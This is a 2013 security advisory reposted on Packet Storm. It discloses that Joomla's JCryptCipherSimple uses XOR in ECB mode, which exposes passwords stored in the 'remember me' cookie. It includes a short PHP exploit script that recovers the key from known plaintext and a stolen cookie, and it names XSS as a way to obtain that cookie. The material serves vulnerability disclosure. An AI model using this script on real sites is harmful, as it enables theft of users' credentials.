what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Cryptography Weakness

Joomla Cryptography Weakness
Posted Jun 18, 2013
Authored by Marco Beierer

All current and past versions of Joomla up to 1.5.26, 2.5.11, and 3.1.1 use ECB mode when performing encryption with JCryptCipherSimple.

tags | exploit
SHA-256 | 056f3c648624085ce973d974be3e5ffcb05a2aa6b08a0a39b5ff0b00c4f7686a

Joomla Cryptography Weakness

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

# Vulnerable Application
All current and past versions of Joomla (http://www.joomla.org) up to
1.5.26, 2.5.11, 3.1.1. Also the Joomla platform and maybe the Joomla
framework (not tested). At the moment there is no vendor patch available.


# The Problem
The problem occurs in the implementation of JCryptCipherSimple. The
JCryptCipherSimple encrypts a text with an simple XOR operation in the
Electronic Codebook Mode (ECB). The ECB is insecure by design and
normally just used for education purposes because of its simplicity.

For the encryption, the plaintext is split into small blocks and
encrypted block by block. Each block has the same length as the key.
The mathematical equation for the encryption is:
Ciphertext = Plaintext XOR Key

If the ciphertext and at least one block of the plaintext is known, it
is thus very easy to calculate the key. To calculate the key, the
equation could be rearranged as follows:
Key = Ciphertext XOR Plaintext

So, if an attacker knows the plaintext corresponding to one block
ciphertext, he is able to calculate the key and thus to decrypt the
complete ciphertext.


# An example in the Joomla core
In the Joomla core the JCryptCipherSimple is used for the "remember
me" function. There the serialized user credentials are encrypted with
the JCryptCipherSimple. The serialized credentials look for example
like this:
a:2:{s:8:"username";s:12:"the_username";s:8:"password";s:12:"the_password";}

The used key is 32 characters long. The first block to encrypt is thus:
a:2:{s:8:"username";s:12:"the_us

So the attacker must only know the beginning of the username of the
victim to calculate the key and decrypt the second and third block
(including the password of the victim).


# Exploit the core vulnerability
To exploit the vulnerability it is necessary to steal the "remember
me" cookie of an user. This is for example possible through an XSS
vulnerability.

Then the key could be calculated with the script below. The script is
written for the Joomla Platform 12.3. The used functions are identical
with these used in the current versions of the CMS. To calculate the
key it is necessary to set the variables $plaintext (known part of the
credentials) and $ciphertext (content of the remember me cookie) and
then execute the script. Maybe it is also necessary to adjust the path
to the needed library files.


# The exploit script
require '../libraries/import.php';
require_once '../libraries/legacy/application/application.php';

class CalculateKey extends JApplicationCli {
public function execute() {
$plaintext = ''; // first part of serialized credentials
$cyphertext = ''; // content of remember me cookie

$key = new JCryptKey('simple', $plaintext, $plaintext);
$crypt = new JCrypt(new JCryptCipherSimple, $key);
$out = $crypt->decrypt($cyphertext);
$out = substr($out, 0, 32);

$this->out($out);
}
}
JApplicationCli::getInstance('CalculateKey')->execute();


# What else?
The JCryptCipherSimple may also be used by third party developers in
their Joomla extensions, so there is an unknown number of vulnerable
extensions.


# Solution
A solution to the problem would be to rewrite the JCryptCipherSimple
to be non-deterministic. This could be achieved by using another mode
of operation. An alternative is to use another by the Joomla core
provided cipher and remove the JCryptCipherSimple.


# History
2013.05.11 Vulnerability reported to the vendor
2013.05.12 Vendor asked for details
2013.05.12 Details and exploit provided to the vendor
2013.05.30 Asked vendor about the status of investigation (no response)
2013.06.11 Sent another mail to the vendor (no response)
2013.06.15 Full disclosure
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBAgAGBQJRwHrPAAoJEDIfni1i6osAU/YH/AghxYMCsshx36xANdvNJOzK
k0bSCexjnXygIrmW8qWOYiSrcwvG27YCyuXK15vgckZi4b/SGi0Wr4GcEqT6y9zU
s3F9okTRQCuupLOB/aPffKj8G1yh38CvZRhPp4FUTMd8HIyb/Tyr5QgGpVyGZI9f
8C34zUkeDz9HysVWw+fzKjF9fb6g5YT63N9FWqEmFVfiA4pf8lev+GvXMJjv5jhO
qKhw7q7pfGGZjMk3xdt/avcYGOoHxm7pFozQFqJzBYE9WscNd9S1het0677tZw6+
rdsO9c5RhVcrSsgSySU/EmZvJUnZnI1923GjBdxLASEhu0wjViTRtwKbpSWeAGM=
=j2cF
-----END PGP SIGNATURE-----


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close